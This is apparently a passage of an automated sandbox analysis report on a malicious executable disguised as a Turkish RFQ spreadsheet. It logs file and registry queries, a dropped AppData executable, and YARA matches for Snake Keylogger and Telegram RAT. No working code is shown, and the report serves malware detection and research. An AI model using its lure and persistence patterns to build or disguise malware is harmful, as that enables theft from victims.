                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Users\user\AppData\Roaming\gNFUFfdz.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Users\user\AppData\Roaming\gNFUFfdz.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3654868131.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
